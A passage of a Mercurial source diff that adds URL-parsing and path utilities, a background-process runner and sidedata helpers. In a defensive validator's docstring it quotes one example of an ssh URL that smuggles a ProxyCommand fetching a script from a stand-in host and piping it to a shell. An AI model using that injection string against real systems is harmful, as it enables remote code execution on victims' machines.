+ raise error.InputError(_(b"invalid day spec: %s") % date[1:])
if days < 0:
- raise error.Abort(
+ raise error.InputError(
_(b"%s must be nonnegative (see 'hg help dates')") % date[1:]
)
when = makedate()[0] - days * 3600 * 24
--- a/mercurial/utils/procutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/utils/procutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# procutil.py - utility for managing processes and executable environment
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
@@ -701,7 +701,88 @@
else:
- def runbgcommand(
+ def runbgcommandpy3(
+ cmd,
+ env,
+ shell=False,
+ stdout=None,
+ stderr=None,
+ ensurestart=True,
+ record_wait=None,
+ stdin_bytes=None,
+ ):
+ """Spawn a command without waiting for it to finish.
+
+
+ When `record_wait` is not None, the spawned process will not be fully
+ detached and the `record_wait` argument will be called with a the
+ `Subprocess.wait` function for the spawned process. This is mostly
+ useful for developers that need to make sure the spawned process
+ finished before a certain point. (eg: writing test)"""
+ if pycompat.isdarwin:
+ # avoid crash in CoreFoundation in case another thread
+ # calls gui() while we're calling fork().
+ gui()
+
+ if shell:
+ script = cmd
+ else:
+ if isinstance(cmd, bytes):
+ cmd = [cmd]
+ script = b' '.join(shellquote(x) for x in cmd)
+ if record_wait is None:
+ # double-fork to completely detach from the parent process
+ script = b'( %s ) &' % script
+ start_new_session = True
+ else:
+ start_new_session = False
+ ensurestart = True
+
+ try:
+ if stdin_bytes is None:
+ stdin = subprocess.DEVNULL
+ else:
+ stdin = pycompat.unnamedtempfile()
+ stdin.write(stdin_bytes)
+ stdin.flush()
+ stdin.seek(0)
+ if stdout is None:
+ stdout = subprocess.DEVNULL
+ if stderr is None:
+ stderr = subprocess.DEVNULL
+
+ p = subprocess.Popen(
+ script,
+ shell=True,
+ env=env,
+ close_fds=True,
+ stdin=stdin,
+ stdout=stdout,
+ stderr=stderr,
+ start_new_session=start_new_session,
+ )
+ except Exception:
+ if record_wait is not None:
+ record_wait(255)
+ raise
+ finally:
+ if stdin_bytes is not None:
+ stdin.close()
+ if not ensurestart:
+ # Even though we're not waiting on the child process,
+ # we still must call waitpid() on it at some point so
+ # it's not a zombie/defunct. This is especially relevant for
+ # chg since the parent process won't die anytime soon.
+ # We use a thread to make the overhead tiny.
+ t = threading.Thread(target=lambda: p.wait)
+ t.daemon = True
+ t.start()
+ else:
+ returncode = p.wait
+ if record_wait is not None:
+ record_wait(returncode)
+
+ def runbgcommandpy2(
cmd,
env,
shell=False,
@@ -811,3 +892,14 @@
stdin.close()
if record_wait is None:
os._exit(returncode)
+
+ if pycompat.ispy3:
+ # This branch is more robust, because it avoids running python
+ # code (hence gc finalizers, like sshpeer.__del__, which
+ # blocks). But we can't easily do the equivalent in py2,
+ # because of the lack of start_new_session=True flag. Given
+ # that the py2 branch should die soon, the short-lived
+ # duplication seems acceptable.
+ runbgcommand = runbgcommandpy3
+ else:
+ runbgcommand = runbgcommandpy2
--- a/mercurial/utils/resourceutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/utils/resourceutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# resourceutil.py - utility for looking up resources
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
--- a/mercurial/utils/storageutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/utils/storageutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -23,6 +23,7 @@
pycompat,
)
from ..interfaces import repository
+from ..revlogutils import sidedata as sidedatamod
from ..utils import hashutil
_nullhash = hashutil.sha1(nullid)
@@ -294,6 +295,7 @@
deltamode=repository.CG_DELTAMODE_STD,
revisiondata=False,
assumehaveparentrevisions=False,
+ sidedata_helpers=None,
):
"""Generic implementation of ifiledata.emitrevisions().
@@ -356,6 +358,21 @@
``nodesorder``
``revisiondata``
``assumehaveparentrevisions``
+ ``sidedata_helpers`` (optional)
+ If not None, means that sidedata should be included.
+ A dictionary of revlog type to tuples of `(repo, computers, removers)`:
+ * `repo` is used as an argument for computers
+ * `computers` is a list of `(category, (keys, computer)` that
+ compute the missing sidedata categories that were asked:
+ * `category` is the sidedata category
+ * `keys` are the sidedata keys to be affected
+ * `computer` is the function `(repo, store, rev, sidedata)` that
+ returns a new sidedata dict.
+ * `removers` will remove the keys corresponding to the categories
+ that are present, but not needed.
+ If both `computers` and `removers` are empty, sidedata are simply not
+ transformed.
+ Revlog types are `changelog`, `manifest` or `filelog`.
"""
fnode = store.node
@@ -469,6 +486,17 @@
available.add(rev)
+ sidedata = None
+ if sidedata_helpers:
+ sidedata = store.sidedata(rev)
+ sidedata = run_sidedata_helpers(
+ store=store,
+ sidedata_helpers=sidedata_helpers,
+ sidedata=sidedata,
+ rev=rev,
+ )
+ sidedata = sidedatamod.serialize_sidedata(sidedata)
+
yield resultcls(
node=node,
p1node=fnode(p1rev),
@@ -478,11 +506,31 @@
baserevisionsize=baserevisionsize,
revision=revision,
delta=delta,
+ sidedata=sidedata,
)
prevrev = rev
+def run_sidedata_helpers(store, sidedata_helpers, sidedata, rev):
+ """Returns the sidedata for the given revision after running through
+ the given helpers.
+ - `store`: the revlog this applies to (changelog, manifest, or filelog
+ instance)
+ - `sidedata_helpers`: see `storageutil.emitrevisions`
+ - `sidedata`: previous sidedata at the given rev, if any
+ - `rev`: affected rev of `store`
+ """
+ repo, sd_computers, sd_removers = sidedata_helpers
+ kind = store.revlog_kind
+ for _keys, sd_computer in sd_computers.get(kind, []):
+ sidedata = sd_computer(repo, store, rev, sidedata)
+ for keys, _computer in sd_removers.get(kind, []):
+ for key in keys:
+ sidedata.pop(key, None)
+ return sidedata
+
+
def deltaiscensored(delta, baserev, baselenfn):
"""Determine if a delta represents censored revision data.
--- a/mercurial/utils/stringutil.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/utils/stringutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,7 +1,7 @@
# stringutil.py - utility for generic string formatting, parsing, etc.
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/mercurial/utils/urlutil.py Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,792 @@
+# utils.urlutil - code related to [paths] management
+#
+# Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others
+#
+# This software may be used and distributed according to the terms of the
+# GNU General Public License version 2 or any later version.
+import os
+import re as remod
+import socket
+
+from ..i18n import _
+from ..pycompat import (
+ getattr,
+ setattr,
+)
+from .. import (
+ encoding,
+ error,
+ pycompat,
+ urllibcompat,
+)
+
+
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Union,
+ )
+
+urlreq = urllibcompat.urlreq
+
+
+def getport(port):
+ # type: (Union[bytes, int]) -> int
+ """Return the port for a given network service.
+
+ If port is an integer, it's returned as is. If it's a string, it's
+ looked up using socket.getservbyname(). If there's no matching
+ service, error.Abort is raised.
+ """
+ try:
+ return int(port)
+ except ValueError:
+ pass
+
+ try:
+ return socket.getservbyname(pycompat.sysstr(port))
+ except socket.error:
+ raise error.Abort(
+ _(b"no port number associated with service '%s'") % port
+ )
+
+
+class url(object):
+ r"""Reliable URL parser.
+
+ This parses URLs and provides attributes for the following
+ components:
+
+ <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
+
+ Missing components are set to None. The only exception is
+ fragment, which is set to '' if present but empty.
+
+ If parsefragment is False, fragment is included in query. If
+ parsequery is False, query is included in path. If both are
+ False, both fragment and query are included in path.
+
+ See http://www.ietf.org/rfc/rfc2396.txt for more information.
+
+ Note that for backward compatibility reasons, bundle URLs do not
+ take host names. That means 'bundle://../' has a path of '../'.
+
+ Examples:
+
+ >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
+ <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
+ >>> url(b'ssh://[::1]:2200//home/joe/repo')
+ <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
+ >>> url(b'file:///home/joe/repo')
+ <url scheme: 'file', path: '/home/joe/repo'>
+ >>> url(b'file:///c:/temp/foo/')
+ <url scheme: 'file', path: 'c:/temp/foo/'>
+ >>> url(b'bundle:foo')
+ <url scheme: 'bundle', path: 'foo'>
+ >>> url(b'bundle://../foo')
+ <url scheme: 'bundle', path: '../foo'>
+ >>> url(br'c:\foo\bar')
+ <url path: 'c:\\foo\\bar'>
+ >>> url(br'\\blah\blah\blah')
+ <url path: '\\\\blah\\blah\\blah'>
+ >>> url(br'\\blah\blah\blah#baz')
+ <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
+ >>> url(br'file:///C:\users\me')
+ <url scheme: 'file', path: 'C:\\users\\me'>
+
+ Authentication credentials:
+
+ >>> url(b'ssh://joe:xyz@x/repo')
+ <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
+ >>> url(b'ssh://joe@x/repo')
+ <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
+
+ Query strings and fragments:
+
+ >>> url(b'http://host/a?b#c')
+ <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
+ >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
+ <url scheme: 'http', host: 'host', path: 'a?b#c'>
+
+ Empty path:
+
+ >>> url(b'')
+ <url path: ''>
+ >>> url(b'#a')
+ <url path: '', fragment: 'a'>
+ >>> url(b'http://host/')
+ <url scheme: 'http', host: 'host', path: ''>
+ >>> url(b'http://host/#a')
+ <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
+
+ Only scheme:
+
+ >>> url(b'http:')
+ <url scheme: 'http'>
+ """
+
+ _safechars = b"!~*'()+"
+ _safepchars = b"/!~*'()+:\\"
+ _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
+
+ def __init__(self, path, parsequery=True, parsefragment=True):
+ # type: (bytes, bool, bool) -> None
+ # We slowly chomp away at path until we have only the path left
+ self.scheme = self.user = self.passwd = self.host = None
+ self.port = self.path = self.query = self.fragment = None
+ self._localpath = True
+ self._hostport = b''
+ self._origpath = path
+
+ if parsefragment and b'#' in path:
+ path, self.fragment = path.split(b'#', 1)
+
+ # special case for Windows drive letters and UNC paths
+ if hasdriveletter(path) or path.startswith(b'\\\\'):
+ self.path = path
+ return
+
+ # For compatibility reasons, we can't handle bundle paths as
+ # normal URLS
+ if path.startswith(b'bundle:'):
+ self.scheme = b'bundle'
+ path = path[7:]
+ if path.startswith(b'//'):
+ path = path[2:]
+ self.path = path
+ return
+
+ if self._matchscheme(path):
+ parts = path.split(b':', 1)
+ if parts[0]:
+ self.scheme, path = parts
+ self._localpath = False
+
+ if not path:
+ path = None
+ if self._localpath:
+ self.path = b''
+ return
+ else:
+ if self._localpath:
+ self.path = path
+ return
+
+ if parsequery and b'?' in path:
+ path, self.query = path.split(b'?', 1)
+ if not path:
+ path = None
+ if not self.query:
+ self.query = None
+
+ # // is required to specify a host/authority
+ if path and path.startswith(b'//'):
+ parts = path[2:].split(b'/', 1)
+ if len(parts) > 1:
+ self.host, path = parts
+ else:
+ self.host = parts[0]
+ path = None
+ if not self.host:
+ self.host = None
+ # path of file:///d is /d
+ # path of file:///d:/ is d:/, not /d:/
+ if path and not hasdriveletter(path):
+ path = b'/' + path
+
+ if self.host and b'@' in self.host:
+ self.user, self.host = self.host.rsplit(b'@', 1)
+ if b':' in self.user:
+ self.user, self.passwd = self.user.split(b':', 1)
+ if not self.host:
+ self.host = None
+
+ # Don't split on colons in IPv6 addresses without ports
+ if (
+ self.host
+ and b':' in self.host
+ and not (
+ self.host.startswith(b'[') and self.host.endswith(b']')
+ )
+ ):
+ self._hostport = self.host
+ self.host, self.port = self.host.rsplit(b':', 1)
+ if not self.host:
+ self.host = None
+
+ if (
+ self.host
+ and self.scheme == b'file'
+ and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
+ ):
+ raise error.Abort(
+ _(b'file:// URLs can only refer to localhost')
+ )
+
+ self.path = path
+
+ # leave the query string escaped
+ for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
+ v = getattr(self, a)
+ if v is not None:
+ setattr(self, a, urlreq.unquote(v))
+
+ def copy(self):
+ u = url(b'temporary useless value')
+ u.path = self.path
+ u.scheme = self.scheme
+ u.user = self.user
+ u.passwd = self.passwd
+ u.host = self.host
+ u.path = self.path
+ u.query = self.query
+ u.fragment = self.fragment
+ u._localpath = self._localpath
+ u._hostport = self._hostport
+ u._origpath = self._origpath
+ return u
+
+ @encoding.strmethod
+ def __repr__(self):
+ attrs = []
+ for a in (
+ b'scheme',
+ b'user',
+ b'passwd',
+ b'host',
+ b'port',
+ b'path',
+ b'query',
+ b'fragment',
+ ):
+ v = getattr(self, a)
+ if v is not None:
+ attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
+ return b'<url %s>' % b', '.join(attrs)
+
+ def __bytes__(self):
+ r"""Join the URL's components back into a URL string.
+
+ Examples:
+
+ >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
+ 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
+ >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
+ 'http://user:pw@host:80/?foo=bar&baz=42'
+ >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
+ 'http://user:pw@host:80/?foo=bar%3dbaz'
+ >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
+ 'ssh://user:pw@[::1]:2200//home/joe#'
+ >>> bytes(url(b'http://localhost:80//'))
+ 'http://localhost:80//'
+ >>> bytes(url(b'http://localhost:80/'))
+ 'http://localhost:80/'
+ >>> bytes(url(b'http://localhost:80'))
+ 'http://localhost:80/'
+ >>> bytes(url(b'bundle:foo'))
+ 'bundle:foo'
+ >>> bytes(url(b'bundle://../foo'))
+ 'bundle:../foo'
+ >>> bytes(url(b'path'))
+ 'path'
+ >>> bytes(url(b'file:///tmp/foo/bar'))
+ 'file:///tmp/foo/bar'
+ >>> bytes(url(b'file:///c:/tmp/foo/bar'))
+ 'file:///c:/tmp/foo/bar'
+ >>> print(url(br'bundle:foo\bar'))
+ bundle:foo\bar
+ >>> print(url(br'file:///D:\data\hg'))
+ file:///D:\data\hg
+ """
+ if self._localpath:
+ s = self.path
+ if self.scheme == b'bundle':
+ s = b'bundle:' + s
+ if self.fragment:
+ s += b'#' + self.fragment
+ return s
+
+ s = self.scheme + b':'
+ if self.user or self.passwd or self.host:
+ s += b'//'
+ elif self.scheme and (
+ not self.path
+ or self.path.startswith(b'/')
+ or hasdriveletter(self.path)
+ ):
+ s += b'//'
+ if hasdriveletter(self.path):
+ s += b'/'
+ if self.user:
+ s += urlreq.quote(self.user, safe=self._safechars)
+ if self.passwd:
+ s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
+ if self.user or self.passwd:
+ s += b'@'
+ if self.host:
+ if not (self.host.startswith(b'[') and self.host.endswith(b']')):
+ s += urlreq.quote(self.host)
+ else:
+ s += self.host
+ if self.port:
+ s += b':' + urlreq.quote(self.port)
+ if self.host:
+ s += b'/'
+ if self.path:
+ # TODO: similar to the query string, we should not unescape the
+ # path when we store it, the path might contain '%2f' = '/',
+ # which we should *not* escape.
+ s += urlreq.quote(self.path, safe=self._safepchars)
+ if self.query:
+ # we store the query in escaped form.
+ s += b'?' + self.query
+ if self.fragment is not None:
+ s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
+ return s
+
+ __str__ = encoding.strmethod(__bytes__)
+
+ def authinfo(self):
+ user, passwd = self.user, self.passwd
+ try:
+ self.user, self.passwd = None, None
+ s = bytes(self)
+ finally:
+ self.user, self.passwd = user, passwd
+ if not self.user:
+ return (s, None)
+ # authinfo[1] is passed to urllib2 password manager, and its
+ # URIs must not contain credentials. The host is passed in the
+ # URIs list because Python < 2.4.3 uses only that to search for
+ # a password.
+ return (s, (None, (s, self.host), self.user, self.passwd or b''))
+
+ def isabs(self):
+ if self.scheme and self.scheme != b'file':
+ return True # remote URL
+ if hasdriveletter(self.path):
+ return True # absolute for our purposes - can't be joined()
+ if self.path.startswith(br'\\'):
+ return True # Windows UNC path
+ if self.path.startswith(b'/'):
+ return True # POSIX-style
+ return False
+
+ def localpath(self):
+ # type: () -> bytes
+ if self.scheme == b'file' or self.scheme == b'bundle':
+ path = self.path or b'/'
+ # For Windows, we need to promote hosts containing drive
+ # letters to paths with drive letters.
+ if hasdriveletter(self._hostport):
+ path = self._hostport + b'/' + self.path
+ elif (
+ self.host is not None and self.path and not hasdriveletter(path)
+ ):
+ path = b'/' + path
+ return path
+ return self._origpath
+
+ def islocal(self):
+ '''whether localpath will return something that posixfile can open'''
+ return (
+ not self.scheme
+ or self.scheme == b'file'
+ or self.scheme == b'bundle'
+ )
+
+
+def hasscheme(path):
+ # type: (bytes) -> bool
+ return bool(url(path).scheme) # cast to help pytype
+
+
+def hasdriveletter(path):
+ # type: (bytes) -> bool
+ return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
+
+
+def urllocalpath(path):
+ # type: (bytes) -> bytes
+ return url(path, parsequery=False, parsefragment=False).localpath()
+
+
+def checksafessh(path):
+ # type: (bytes) -> None
+ """check if a path / url is a potentially unsafe ssh exploit (SEC)
+
+ This is a sanity check for ssh urls. ssh will parse the first item as
+ an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
+ Let's prevent these potentially exploited urls entirely and warn the
+ user.
+
+ Raises an error.Abort when the url is unsafe.
+ """
+ path = urlreq.unquote(path)
+ if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
+ raise error.Abort(
+ _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
+ )
+
+
+def hidepassword(u):
+ # type: (bytes) -> bytes
+ '''hide user credential in a url string'''
+ u = url(u)
+ if u.passwd:
+ u.passwd = b'***'
+ return bytes(u)
+
+
+def removeauth(u):
+ # type: (bytes) -> bytes
+ '''remove all authentication information from a url string'''
+ u = url(u)
+ u.user = u.passwd = None
+ return bytes(u)
+
+
+def get_push_paths(repo, ui, dests):
+ """yields all the `path` selected as push destination by `dests`"""
+ if not dests:
+ if b'default-push' in ui.paths:
+ yield ui.paths[b'default-push']
+ elif b'default' in ui.paths:
+ yield ui.paths[b'default']
+ else:
+ raise error.ConfigError(
+ _(b'default repository not configured!'),
+ hint=_(b"see 'hg help config.paths'"),
+ )
+ else:
+ for dest in dests:
+ yield ui.getpath(dest)
+
+
+def get_pull_paths(repo, ui, sources, default_branches=()):
+ """yields all the `(path, branch)` selected as pull source by `sources`"""
+ if not sources:
+ sources = [b'default']
+ for source in sources:
+ if source in ui.paths:
+ url = ui.paths[source].rawloc
+ else:
+ # Try to resolve as a local path or URI.
+ try:
+ # we pass the ui instance are warning might need to be issued
+ url = path(ui, None, rawloc=source).rawloc
+ except ValueError:
+ url = source
+ yield parseurl(url, default_branches)
+
+
+def get_unique_push_path(action, repo, ui, dest=None):
+ """return a unique `path` or abort if multiple are found
+
+ This is useful for command and action that does not support multiple
+ destination (yet).
+
+ Note that for now, we cannot get multiple destination so this function is "trivial".
+
+ The `action` parameter will be used for the error message.
+ """
+ if dest is None:
+ dests = []
+ else:
+ dests = [dest]
+ dests = list(get_push_paths(repo, ui, dests))
+ assert len(dests) == 1
+ return dests[0]
+
+
+def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
+ """return a unique `(path, branch)` or abort if multiple are found
+
+ This is useful for command and action that does not support multiple
+ destination (yet).
+
+ Note that for now, we cannot get multiple destination so this function is "trivial".
+
+ The `action` parameter will be used for the error message.
+ """
+ if source is None:
+ if b'default' in ui.paths:
+ url = ui.paths[b'default'].rawloc
+ else:
+ # XXX this is the historical default behavior, but that is not
+ # great, consider breaking BC on this.
+ url = b'default'
+ else:
+ if source in ui.paths:
+ url = ui.paths[source].rawloc
+ else:
+ # Try to resolve as a local path or URI.
+ try:
+ # we pass the ui instance are warning might need to be issued
+ url = path(ui, None, rawloc=source).rawloc
+ except ValueError:
+ url = source
+ return parseurl(url, default_branches)
+
+
+def get_clone_path(ui, source, default_branches=()):
+ """return the `(origsource, path, branch)` selected as clone source"""
+ if source is None:
+ if b'default' in ui.paths:
+ url = ui.paths[b'default'].rawloc
+ else:
+ # XXX this is the historical default behavior, but that is not
+ # great, consider breaking BC on this.
+ url = b'default'
+ else:
+ if source in ui.paths:
+ url = ui.paths[source].rawloc
+ else:
+ # Try to resolve as a local path or URI.
+ try:
+ # we pass the ui instance are warning might need to be issued
+ url = path(ui, None, rawloc=source).rawloc
+ except ValueError:
+ url = source
+ clone_path, branch = parseurl(url, default_branches)
+ return url, clone_path, branch
+
+
+def parseurl(path, branches=None):
+ '''parse url#branch, returning (url, (branch, branches))'''
+ u = url(path)
+ branch = None
+ if u.fragment:
+ branch = u.fragment
+ u.fragment = None
+ return bytes(u), (branch, branches or [])
+
+
+class paths(dict):
+ """Represents a collection of paths and their configs.
+
+ Data is initially derived from ui instances and the config files they have
+ loaded.
+ """
+
+ def __init__(self, ui):
+ dict.__init__(self)
+
+ for name, loc in ui.configitems(b'paths', ignoresub=True):
+ # No location is the same as not existing.
+ if not loc:
+ continue
+ loc, sub_opts = ui.configsuboptions(b'paths', name)
+ self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
+
+ for name, p in sorted(self.items()):
+ p.chain_path(ui, self)
+
+ def getpath(self, ui, name, default=None):
+ """Return a ``path`` from a string, falling back to default.
+
+ ``name`` can be a named path or locations. Locations are filesystem
+ paths or URIs.
+
+ Returns None if ``name`` is not a registered path, a URI, or a local
+ path to a repo.
+ """
+ # Only fall back to default if no path was requested.
+ if name is None:
+ if not default:
+ default = ()
+ elif not isinstance(default, (tuple, list)):
+ default = (default,)
+ for k in default:
+ try:
+ return self[k]
+ except KeyError:
+ continue
+ return None
+
+ # Most likely empty string.
+ # This may need to raise in the future.
+ if not name:
+ return None
+
+ try:
+ return self[name]
+ except KeyError:
+ # Try to resolve as a local path or URI.
+ try:
+ # we pass the ui instance are warning might need to be issued
+ return path(ui, None, rawloc=name)
+ except ValueError:
+ raise error.RepoError(_(b'repository %s does not exist') % name)
+
+
+_pathsuboptions = {}
+
+
+def pathsuboption(option, attr):
+ """Decorator used to declare a path sub-option.
+
+ Arguments are the sub-option name and the attribute it should set on
+ ``path`` instances.
+
+ The decorated function will receive as arguments a ``ui`` instance,
+ ``path`` instance, and the string value of this option from the config.
+ The function should return the value that will be set on the ``path``
+ instance.
+
+ This decorator can be used to perform additional verification of
+ sub-options and to change the type of sub-options.
+ """
+
+ def register(func):
+ _pathsuboptions[option] = (attr, func)
+ return func
+
+ return register
+
+
+@pathsuboption(b'pushurl', b'pushloc')
+def pushurlpathoption(ui, path, value):
+ u = url(value)
+ # Actually require a URL.
+ if not u.scheme:
+ ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
+ return None
+
+ # Don't support the #foo syntax in the push URL to declare branch to
+ # push.
+ if u.fragment:
+ ui.warn(
+ _(
+ b'("#fragment" in paths.%s:pushurl not supported; '
+ b'ignoring)\n'
+ )
+ % path.name
+ )
+ u.fragment = None
+
+ return bytes(u)
+
+
+@pathsuboption(b'pushrev', b'pushrev')
+def pushrevpathoption(ui, path, value):
+ return value
+
+
+class path(object):
+ """Represents an individual path and its configuration."""
+
+ def __init__(self, ui, name, rawloc=None, suboptions=None):
+ """Construct a path from its config options.
+
+ ``ui`` is the ``ui`` instance the path is coming from.
+ ``name`` is the symbolic name of the path.
+ ``rawloc`` is the raw location, as defined in the config.
+ ``pushloc`` is the raw locations pushes should be made to.
+
+ If ``name`` is not defined, we require that the location be a) a local
+ filesystem path with a .hg directory or b) a URL. If not,
+ ``ValueError`` is raised.
+ """
+ if not rawloc:
+ raise ValueError(b'rawloc must be defined')
+
+ # Locations may define branches via syntax <base>#<branch>.
+ u = url(rawloc)
+ branch = None
+ if u.fragment:
+ branch = u.fragment
+ u.fragment = None
+
+ self.url = u
+ # the url from the config/command line before dealing with `path://`
+ self.raw_url = u.copy()
+ self.branch = branch
+
+ self.name = name
+ self.rawloc = rawloc
+ self.loc = b'%s' % u
+
+ self._validate_path()
+
+ _path, sub_opts = ui.configsuboptions(b'paths', b'*')
+ self._own_sub_opts = {}
+ if suboptions is not None:
+ self._own_sub_opts = suboptions.copy()
+ sub_opts.update(suboptions)
+ self._all_sub_opts = sub_opts.copy()
+
+ self._apply_suboptions(ui, sub_opts)
+
+ def chain_path(self, ui, paths):
+ if self.url.scheme == b'path':
+ assert self.url.path is None
+ try:
+ subpath = paths[self.url.host]
+ except KeyError:
+ m = _(b'cannot use `%s`, "%s" is not a known path')
+ m %= (self.rawloc, self.url.host)
+ raise error.Abort(m)
+ if subpath.raw_url.scheme == b'path':
+ m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
+ m %= (self.rawloc, self.url.host)
+ raise error.Abort(m)
+ self.url = subpath.url
+ self.rawloc = subpath.rawloc
+ self.loc = subpath.loc
+ if self.branch is None:
+ self.branch = subpath.branch
+ else:
+ base = self.rawloc.rsplit(b'#', 1)[0]
+ self.rawloc = b'%s#%s' % (base, self.branch)
+ suboptions = subpath._all_sub_opts.copy()
+ suboptions.update(self._own_sub_opts)
+ self._apply_suboptions(ui, suboptions)
+
+ def _validate_path(self):
+ # When given a raw location but not a symbolic name, validate the
+ # location is valid.
+ if (
+ not self.name
+ and not self.url.scheme
+ and not self._isvalidlocalpath(self.loc)
+ ):
+ raise ValueError(
+ b'location is not a URL or path to a local '
+ b'repo: %s' % self.rawloc
+ )
+
+ def _apply_suboptions(self, ui, sub_options):
+ # Now process the sub-options. If a sub-option is registered, its
+ # attribute will always be present. The value will be None if there
+ # was no valid sub-option.
+ for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
+ if suboption not in sub_options:
+ setattr(self, attr, None)
+ continue
+
+ value = func(ui, self, sub_options[suboption])
+ setattr(self, attr, value)
+
+ def _isvalidlocalpath(self, path):
+ """Returns True if the given path is a potentially valid repository.
+ This is its own function so that extensions can change the definition of
+ 'valid' in this case (like when pulling from a git repo into a hg
+ one)."""
+ try:
+ return os.path.isdir(os.path.join(path, b'.hg'))
+ # Python 2 may return TypeError. Python 3, ValueError.
+ except (TypeError, ValueError):
+ return False
+
+ @property
+ def suboptions(self):
+ """Return sub-options and their values for this path.
+
+ This is intended to be used for presentation purposes.
+ """
+ d = {}
+ for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions):
+ value = getattr(self, attr)
+ if value is not None:
+ d[subopt] = value
+ return d
--- a/mercurial/verify.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/verify.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# verify.py - repository integrity checking for Mercurial
#
-# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -416,7 +416,7 @@
storefiles = set()
subdirs = set()
revlogv1 = self.revlogv1
- for f, f2, size in repo.store.datafiles():
+ for t, f, f2, size in repo.store.datafiles():
if not f:
self._err(None, _(b"cannot decode filename '%s'") % f2)
elif (size > 0 or not revlogv1) and f.startswith(b'meta/'):
@@ -480,7 +480,7 @@
ui.status(_(b"checking files\n"))
storefiles = set()
- for f, f2, size in repo.store.datafiles():
+ for rl_type, f, f2, size in repo.store.datafiles():
if not f:
self._err(None, _(b"cannot decode filename '%s'") % f2)
elif (size > 0 or not revlogv1) and f.startswith(b'data/'):
--- a/mercurial/vfs.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/vfs.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# vfs.py - Mercurial 'vfs' classes
#
-# Copyright Matt Mackall <mpm@selenic.com>
+# Copyright Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/win32.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/win32.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# win32.py - utility functions that use win32 API
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/windows.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/windows.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# windows.py - Windows utility function implementations for Mercurial
#
-# Copyright 2005-2009 Matt Mackall <mpm@selenic.com> and others
+# Copyright 2005-2009 Olivia Mackall <olivia@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/wireprotoserver.py Thu Mar 25 19:06:28 2021 -0400
